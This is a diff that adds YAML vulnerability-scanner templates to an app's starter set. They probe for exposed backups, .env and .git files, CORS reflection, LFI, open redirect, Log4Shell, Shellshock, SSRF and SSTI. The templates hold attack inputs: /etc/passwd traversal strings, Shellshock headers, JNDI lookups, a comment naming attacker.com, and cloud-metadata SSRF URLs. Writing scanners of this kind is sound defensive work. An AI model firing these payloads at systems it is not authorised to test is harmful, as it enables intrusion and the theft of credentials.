dsad

src-tauri/starter_templates/xpl-backup-files.yaml

@@ -0,0 +1,52 @@
+id: xpl-backup-files
+info:
+  name: "Backup & Source File Exposure"
+  author: imtaqin
+  severity: high
+  description: |
+    Common backup/artifact filenames left in web-root — often contain
+    source code, credentials, or database dumps.
+  tags:
+    - exposure
+    - backup
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/backup.zip"
+      - "{{BaseURL}}/backup.tar.gz"
+      - "{{BaseURL}}/backup.sql"
+      - "{{BaseURL}}/db.sql"
+      - "{{BaseURL}}/dump.sql"
+      - "{{BaseURL}}/site.zip"
+      - "{{BaseURL}}/www.zip"
+      - "{{BaseURL}}/public_html.zip"
+      - "{{BaseURL}}/.bash_history"
+      - "{{BaseURL}}/.DS_Store"
+    # ALL conditions must be true — kill false positives from default 404 pages.
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      - type: dsl
+        dsl:
+          - "size > 512"
+        name: real-content
+      # Must NOT be a standard HTML error page
+      - type: word
+        part: body
+        words:
+          - "<!DOCTYPE html"
+          - "<html"
+          - "Not Found"
+          - "404 Not Found"
+          - "Forbidden"
+          - "Error"
+        condition: or
+        negative: true
+      # Must NOT be served as HTML (backup files are octet-stream, zip, sql, etc)
+      - type: regex
+        part: header
+        regex:
+          - "(?i)content-type:\\s*text/html"
+        negative: true

src-tauri/starter_templates/xpl-cors-misconfig.yaml

@@ -0,0 +1,33 @@
+id: xpl-cors-misconfig
+info:
+  name: "CORS Misconfiguration (Origin Reflection)"
+  author: imtaqin
+  severity: medium
+  description: |
+    The server reflects an attacker-controlled Origin header and
+    also sets Access-Control-Allow-Credentials:true — a classic
+    account-takeover primitive.
+  tags:
+    - cors
+    - misconfig
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+      - "{{BaseURL}}/api/user"
+      - "{{BaseURL}}/api/me"
+    headers:
+      Origin: "https://evil.example"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - "(?i)access-control-allow-origin:\\s*https://evil\\.example"
+        name: origin-reflected
+      - type: regex
+        part: header
+        regex:
+          - "(?i)access-control-allow-credentials:\\s*true"
+        name: credentials-enabled

src-tauri/starter_templates/xpl-env-leak.yaml

@@ -0,0 +1,38 @@
+id: xpl-env-leak
+info:
+  name: ".env File Exposure"
+  author: imtaqin
+  severity: high
+  description: |
+    Detects exposed .env files containing credentials, API keys,
+    or database passwords.
+  tags:
+    - exposure
+    - config
+    - credential-leak
+  reference:
+    - https://owasp.org/www-community/vulnerabilities/Information_exposure_through_files
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.env"
+      - "{{BaseURL}}/.env.local"
+      - "{{BaseURL}}/.env.production"
+      - "{{BaseURL}}/.env.backup"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      # must contain actual env-style KEY=VALUE pairs with sensitive names
+      - type: regex
+        part: body
+        regex:
+          - "(?im)^(APP_KEY|DB_PASSWORD|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|SECRET_KEY|API_KEY|PRIVATE_KEY|STRIPE_SECRET|JWT_SECRET)="
+        name: env-secret
+      # must NOT be served as HTML (default 404 page)
+      - type: regex
+        part: header
+        regex:
+          - "(?i)content-type:\\s*text/html"
+        negative: true

src-tauri/starter_templates/xpl-git-config.yaml

@@ -0,0 +1,50 @@
+id: xpl-git-config
+info:
+  name: ".git Directory Exposure"
+  author: imtaqin
+  severity: high
+  description: |
+    Exposed .git/config or .git/HEAD — the entire git repository
+    (with history + potentially secrets) can be dumped.
+  tags:
+    - exposure
+    - git
+  reference:
+    - https://github.com/internetwache/GitTools
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.git/config"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      # exact signature of a git config file
+      - type: word
+        part: body
+        words:
+          - "[core]"
+          - "repositoryformatversion"
+        condition: and
+      - type: regex
+        part: header
+        regex:
+          - "(?i)content-type:\\s*text/html"
+        negative: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/.git/HEAD"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      # HEAD file is short + starts with "ref:" or is a 40-char hex hash
+      - type: regex
+        part: body
+        regex:
+          - "^(ref: refs/heads/|[a-f0-9]{40})"
+      - type: dsl
+        dsl:
+          - "size < 200"

src-tauri/starter_templates/xpl-lfi-basic.yaml

@@ -0,0 +1,42 @@
+id: xpl-lfi-basic
+info:
+  name: "Local File Inclusion (LFI)"
+  author: imtaqin
+  severity: high
+  description: |
+    Classic path-traversal test across common vulnerable parameters.
+    Uses clusterbomb attack to combine traversal depths and payloads.
+  tags:
+    - lfi
+    - path-traversal
+  reference:
+    - https://owasp.org/www-community/attacks/Path_Traversal
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?page={{fuzz}}"
+      - "{{BaseURL}}/?file={{fuzz}}"
+      - "{{BaseURL}}/download?file={{fuzz}}"
+      - "{{BaseURL}}/view.php?template={{fuzz}}"
+    attack: batteringram
+    payloads:
+      fuzz:
+        - "../../../../etc/passwd"
+        - "../../../../../../etc/passwd"
+        - "....//....//....//etc/passwd"
+        - "..%2f..%2f..%2fetc%2fpasswd"
+        - "php://filter/convert.base64-encode/resource=index.php"
+    stop_at_first_match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0:"
+        name: etc-passwd
+      - type: regex
+        part: body
+        regex:
+          - "^[A-Za-z0-9+/]{100,}={0,2}$"
+        name: base64-filter

src-tauri/starter_templates/xpl-open-redirect.yaml

@@ -0,0 +1,29 @@
+id: xpl-open-redirect
+info:
+  name: "Open Redirect"
+  author: imtaqin
+  severity: medium
+  description: |
+    Redirect parameters that accept arbitrary external URLs, usable
+    for phishing + OAuth token theft.
+  tags:
+    - open-redirect
+    - phishing
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/redirect?url=https://evil.example/"
+      - "{{BaseURL}}/go?to=https://evil.example/"
+      - "{{BaseURL}}/out?dest=https://evil.example/"
+      - "{{BaseURL}}/login?next=https://evil.example/"
+    redirects: false
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [301, 302, 303, 307, 308]
+      - type: regex
+        part: header
+        regex:
+          - "(?i)^location:\\s*https?://evil\\.example"
+        name: redirect-to-evil

src-tauri/starter_templates/xpl-phpinfo.yaml

@@ -0,0 +1,43 @@
+id: xpl-phpinfo
+info:
+  name: "phpinfo() Exposure"
+  author: imtaqin
+  severity: medium
+  description: |
+    phpinfo pages reveal PHP version, loaded modules, environment
+    variables, and file-system paths.
+  tags:
+    - exposure
+    - php
+    - infoleak
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/phpinfo.php"
+      - "{{BaseURL}}/info.php"
+      - "{{BaseURL}}/test.php"
+      - "{{BaseURL}}/_profiler/phpinfo"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      # must contain all 3 phpinfo signatures to be confident
+      - type: word
+        part: body
+        words:
+          - "PHP Version"
+          - "phpinfo()"
+          - "System"
+        condition: and
+      - type: word
+        part: body
+        words:
+          - "<title>phpinfo()</title>"
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "PHP Version </td><td class=\"v\">([0-9.]+)"
+        group: 1
+        name: php-version

src-tauri/starter_templates/xpl-rce-log4shell.yaml

@@ -0,0 +1,52 @@
+id: xpl-rce-log4shell
+info:
+  name: "Log4Shell JNDI Injection (CVE-2021-44228)"
+  author: imtaqin
+  severity: critical
+  description: |
+    Checks common endpoints for reflection of JNDI lookup payloads.
+    NOTE: true blind RCE detection requires an OOB server —
+    the cloud subscription provides interact.sh-lite for reliable
+    callback validation.
+  tags:
+    - cve
+    - rce
+    - log4j
+    - jndi
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-score: 10.0
+    cve-id: CVE-2021-44228
+
+# TODO(backend): when OOB is enabled, swap `${jndi:ldap://attacker.com}`
+# for `${jndi:ldap://{{interactsh-url}}/{{randstr}}}` and correlate callbacks.
+
+variables:
+  canary: "xpl_log4j_{{randstr}}"
+  jndi: "${jndi:ldap://xpl.invalid/{{canary}}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      User-Agent: "{{jndi}}"
+      X-Api-Version: "{{jndi}}"
+      Referer: "{{jndi}}"
+      X-Forwarded-For: "{{jndi}}"
+      Authorization: "Bearer {{jndi}}"
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: all
+        words:
+          - "{{canary}}"
+        name: canary-echo
+      - type: word
+        part: body
+        words:
+          - "java.net.UnknownHostException: xpl.invalid"
+          - "JndiLookup"
+        condition: or
+        name: jndi-error

src-tauri/starter_templates/xpl-rce-shellshock.yaml

@@ -0,0 +1,47 @@
+id: xpl-rce-shellshock
+info:
+  name: "Bash Shellshock RCE (CVE-2014-6271)"
+  author: imtaqin
+  severity: critical
+  description: |
+    Remote code execution via malformed function definitions in Bash
+    environment variables, exploitable through CGI endpoints.
+  tags:
+    - cve
+    - rce
+    - shellshock
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-6271
+  classification:
+    cvss-score: 10.0
+    cve-id: CVE-2014-6271
+
+variables:
+  marker: "xpl_shock_{{randstr}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/status"
+      - "{{BaseURL}}/cgi-bin/test"
+      - "{{BaseURL}}/cgi-bin/test.cgi"
+      - "{{BaseURL}}/cgi-bin/test.sh"
+      - "{{BaseURL}}/cgi-bin/bash"
+      - "{{BaseURL}}/cgi-bin/env"
+      - "{{BaseURL}}/cgi-bin/info.sh"
+    headers:
+      User-Agent: "() { :; }; echo; echo; /bin/echo {{marker}}"
+      Cookie: "() { :; }; echo; echo; /bin/echo {{marker}}"
+      Referer: "() { :; }; echo; echo; /bin/echo {{marker}}"
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{marker}}"
+        name: body-reflection
+      - type: word
+        part: header
+        words:
+          - "{{marker}}"
+        name: header-reflection

src-tauri/starter_templates/xpl-ssrf-basic.yaml

@@ -0,0 +1,36 @@
+id: xpl-ssrf-basic
+info:
+  name: "Server-Side Request Forgery (basic reflection)"
+  author: imtaqin
+  severity: high
+  description: |
+    Checks for reflection of internal metadata endpoints in response
+    bodies via common SSRF-prone parameters.
+    NOTE: blind SSRF requires OOB (cloud tier).
+  tags:
+    - ssrf
+
+# TODO(backend): swap http://169.254.169.254 for {{interactsh-url}} when
+# the cloud OOB server is enabled; correlate DNS/HTTP callbacks.
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/fetch?url=http://169.254.169.254/latest/meta-data/"
+      - "{{BaseURL}}/proxy?u=http://169.254.169.254/latest/meta-data/"
+      - "{{BaseURL}}/image?src=http://169.254.169.254/"
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "ami-id"
+          - "instance-id"
+          - "security-credentials"
+        condition: or
+        name: aws-metadata-reflected
+      - type: regex
+        part: body
+        regex:
+          - "(?i)computeMetadata|project-id"
+        name: gcp-metadata-reflected

src-tauri/starter_templates/xpl-ssti-jinja2.yaml

@@ -0,0 +1,43 @@
+id: xpl-ssti-jinja2
+info:
+  name: "Server-Side Template Injection (Jinja2/Flask)"
+  author: imtaqin
+  severity: critical
+  description: |
+    Detects Jinja2 SSTI by injecting a math expression with an unusual
+    product (999 * 777 = 776223) that's unlikely to appear naturally.
+    Confirms only when the exact computed value is reflected AND the
+    raw payload with {{ }} is NOT echoed back verbatim.
+  tags:
+    - ssti
+    - rce
+    - python
+    - jinja2
+
+http:
+  # Payload is literal `xplZZZ{{999*777}}ssti` — the engine's expand() leaves
+  # {{999*777}} alone since it's not a known variable name. If the target has
+  # Jinja2 SSTI on that parameter, the server renders it to `xplZZZ776223ssti`.
+  - method: GET
+    path:
+      - "{{BaseURL}}/?name=xplZZZ{{999*777}}ssti"
+      - "{{BaseURL}}/?q=xplZZZ{{999*777}}ssti"
+      - "{{BaseURL}}/search?q=xplZZZ{{999*777}}ssti"
+      - "{{BaseURL}}/hello/xplZZZ{{999*777}}ssti"
+    stop_at_first_match: true
+    matchers-condition: and
+    matchers:
+      # must be 2xx (not 400/404 - those show errors which may contain our payload)
+      - type: status
+        status: [200, 201, 204]
+      # computed value must appear — very specific string
+      - type: word
+        part: body
+        words:
+          - "xplZZZ776223ssti"
+      # raw payload must NOT be echoed verbatim (server evaluated it)
+      - type: word
+        part: body
+        words:
+          - "xplZZZ{{999*777}}ssti"
+        negative: true

src-tauri/starter_templates/xpl-ssti-twig.yaml

@@ -0,0 +1,35 @@
+id: xpl-ssti-twig
+info:
+  name: "Server-Side Template Injection (Twig/PHP)"
+  author: imtaqin
+  severity: critical
+  description: |
+    Twig SSTI via upper() filter on a unique marker. Confirms only when
+    the unique uppercase value is reflected AND the raw {{ }} payload
+    is NOT echoed back.
+  tags:
+    - ssti
+    - rce
+    - php
+    - twig
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "name=xplZZZ{{'xplmarker'|upper}}ssti"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200, 201]
+      - type: word
+        part: body
+        words:
+          - "xplZZZXPLMARKERssti"
+      - type: word
+        part: body
+        words:
+          - "{{'xplmarker'|upper}}"
+        negative: true

src-tauri/starter_templates/xpl-wp-debug.yaml

@@ -0,0 +1,37 @@
+id: xpl-wp-debug
+info:
+  name: "WordPress debug.log Exposure"
+  author: imtaqin
+  severity: medium
+  tags:
+    - wordpress
+    - exposure
+    - debug
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/debug.log"
+      - "{{BaseURL}}/wp-content/uploads/debug.log"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      # PHP log entries have specific format: [date time UTC] line
+      - type: regex
+        part: body
+        regex:
+          - "^\\[\\d{2}-\\w{3}-\\d{4}"
+      - type: word
+        part: body
+        words:
+          - "PHP Notice"
+          - "PHP Warning"
+          - "PHP Fatal error"
+          - "WordPress database error"
+        condition: or
+      - type: regex
+        part: header
+        regex:
+          - "(?i)content-type:\\s*text/html"
+        negative: true